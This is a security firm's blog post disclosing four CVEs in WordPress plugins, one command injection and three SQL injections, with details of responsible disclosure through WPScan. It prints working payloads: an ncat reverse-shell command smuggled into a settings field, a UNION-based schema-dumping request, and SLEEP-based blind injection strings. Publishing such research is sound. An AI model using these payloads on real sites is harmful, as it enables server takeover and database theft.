LATEST CYBER SECURITY NEWS AND VIEWS

Home > News > WordPress Plugins: Don’t Let Vulnerabilities Crash Your Site’s Party

Latest news

WordPress Plugins: Don’t Let Vulnerabilities Crash Your Site’s Party

Posted on

Like many management systems, WordPress offers extensions to its core functionality that are created by the community and third-party providers. While these extensions are essential for the thriving WordPress ecosystem, the influx of new code introduces fresh vulnerabilities.

Prism Infosec assessed several open-source extensions and found a number of issues that could pose a risk to plugin user’s data and infrastructure. This post details the identification of 4 CVEs.

The following plugins were assessed.

CVE-2023-4797: Newsletters-Lite – Command Injection

WPScan: https://wpscan.com/vulnerability/de169fc7-f388-4abb-ab94-12522fd1ac92


A benefit of open-source software is the ability to look directly at the code when searching for security issues. This was one approach taken in the assessment of the plugins in this post.

Examining the code for the Newsletters-Lite extension revealed the potential for a command injection vulnerability on the email archiving functionality.

In the snippet above, the archiving function executed a command that was constructed by concatenating user-controlled strings into hard-coded command. This can be highly dangerous if input is not correctly sanitised or checked, as it may allow an attacker to alter the structure and content of the command in unintended ways.

The $query parameter above was taken from user input on the extension’s configuration screen.

The plugin assumed that the user would input a numerical value and no further validation was performed on the server-side. The below request was issued to set the value of “Archive Older Than” to contain an arbitrary shell command.

POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1
Host: 192.168.178.130
Content-Length: 13688


-- REDACTED FOR BREVITY --

------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="emailarchive_olderthan"

` ncat 192.168.1.127 -e /bin/bash `#

Backticks were used to ensure that the enclosed call to ncat was interpreted as a subcommand, rather than a part of the original call to mysql. This prevented the malicious input from causing undue syntax errors with the rest of the intended command that could prevent proper execution.

The call to ncat establishes a TCP connection to a host of the attacker’s choosing, upon which it executes the bash interpreter. This technique is called a Reverse Shell. It gives an attacker control over the server’s operating system as the user that the web server software is running under.

Navigating back to the configuration page revealed that the payload had been successfully saved to the database.

Now that the payload was in place, it needed to be executed in order to execute the maliciously constructed shell command and compromise the server. Whilst the archive function runs on a schedule (meaning an attacker could wait), there was an option to run the archive on demand – which allowed the immediate execution of the malicious payload.

When the HTTP request was sent to the server, the reverse shell was established.

The vulnerability was disclosed on WPScan and addressed in version 4.9.3.

CVE-2023-5108: Easy Newsletter Signups – SQL Injection

WPScan: https://wpscan.com/vulnerability/1b277929-e88b-4ab6-9190-526e75f5ce7a

As with command injection, unsafe concatenation of user input can lead to SQL injection vulnerabilities.

In the code below for the Easy Newsletter Signups export functionality, user input is concatenated directly into a SQL query. As in the previous example, this allowed an attacker control over the command to be executed by the underlying OS. In this case, it allows them control over the query executed within the database.

User input is taken directly from the $_GET­ global variable and concatenated into the query string. By intercepting the request for the export operation using BurpSuite, it was possible to inject valid arbitrary SQL via the nsl_id parameter.

GET /wp-admin/admin.php?export=Export+CSV&page=wpens-list&s=&_wpnonce=f59700b4db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpens-list&action=-1&paged=1&nsl_id%5B%5D=265%20UNION%20ALL%20SELECT%20NULL%2cNULL%2cNULL%2cNULL%2cNULL%2cCONCAT(schema_name)%2cNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-&action2=-1 HTTP/1.1

-- REDACTED FOR BREVITY --

The injected query attempts to combine schema information into the intended result set. The CSV data returned in the response contained the database schema requested in the malicious query.

HTTP/1.1 200 OK
Date: Fri, 01 Sep 2023 12:57:40 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Description: File Transfer
Content-Disposition: attachment; filename= wpens-subscribers-01-Sep-2023.csv
Expires: 0
Pragma: public
Connection: close
Content-Type: text/csv;charset=UTF-8
Content-Length: 162

First Name,Last Name,Email,User IP,Created Date
test,test,test18@prisminfosec.com,192.168.178.1,2023-09-01 12:41:18
,,,information_schema,
,,,bitnami_wordpress,

It was then possible to use SQLMap tool to automate the process of exfiltrating the database.

The vulnerability was disclosed on WPScan and no official fix has been released. WordPress has since stated that “This plugin has been closed as of 27 October 2023 and is not available for download. Reason: Security Issue”.

CVE-2023-5041: Track the Click – SQL Injection

WPScan: https://wpscan.com/vulnerability/45194442-6eea-4e07-85a5-4a1e2fde3523

The Track the Click extension was also found to concatenate user input into its statistics query, resulting in a SQL injection vulnerability.

The UI for the function employs a calendar date-picker to populate this parameter. As such, it is expected that the parameter must contain a date.

As no server-side validation was performed, it was possible to inject the SQL SLEEP() function into the affected parameter. A response was received after the amount of time specified in the payload, thereby confirming that there is a blind SQL injection vulnerability.

Exploiting blind SQL injection manually is incredibly arduous and time-consuming. However, tools such as SQLMap automate this process.

The vulnerability was disclosed on WPScan and addressed in version 0.3.12.

CVE-2023-5082: History Log by click5 – SQL Injection

WPScan: https://wpscan.com/vulnerability/13a196ba-49c7-4575-9a49-3ef9eb2348f3/

The History Log extension included a social photo feed from Smash Ballon. To facilitate this, it stored data about feed sources in its database. A delete query including the ID of a source was constructed using concatenated, user-controlled data – and was therefore injectable.

The UI itself does not provide an opportunity to influence the value of the source_id parameter. However, it was possible to inject SQL by altering the request using an intercepting proxy.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 481
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)

-- REDACTED FOR BREVITY --

------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"

sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"
xx
2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)

-- REDACTED FOR BREVITY –

Again, a response was received after the amount of time specified in the payload, thereby confirming that there is a blind SQL injection vulnerability.

The backend database contents were exfiltrated with SQLMap.

The vulnerability was disclosed on WPScan and addressed in version 1.0.13.

Prism Infosec would like to thank the WPScan team for seamlessly handling the disclosure process and hopes that the identified vulnerabilities emphasise the critical importance of proactive security measures in WordPress extensions. Regular security assessments, adherence to secure coding practices, and prompt patching of identified vulnerabilities are essential to mitigate risks and safeguard WordPress-powered websites against malicious exploitation.

All Vulnerabilities were discovered and written by Karolis Narvilas of Prism Infosec.

FILTER RESULTS

Latest tweets

A great conference @BSidesLondon, thanks for having us at #BSidesLDN2024! Looking forward to continuing the relationship next year!

Prism Infosec is proud to be a gold sponsor of @BSidesLondon 2024! Come and visit us on our stand and join in our cyber scavenger hunt! #CyberSecurity #bsides

Sign up to our newsletter

  • Fields marked with an * are mandatory

  • This field is for validation purposes and should be left unchanged.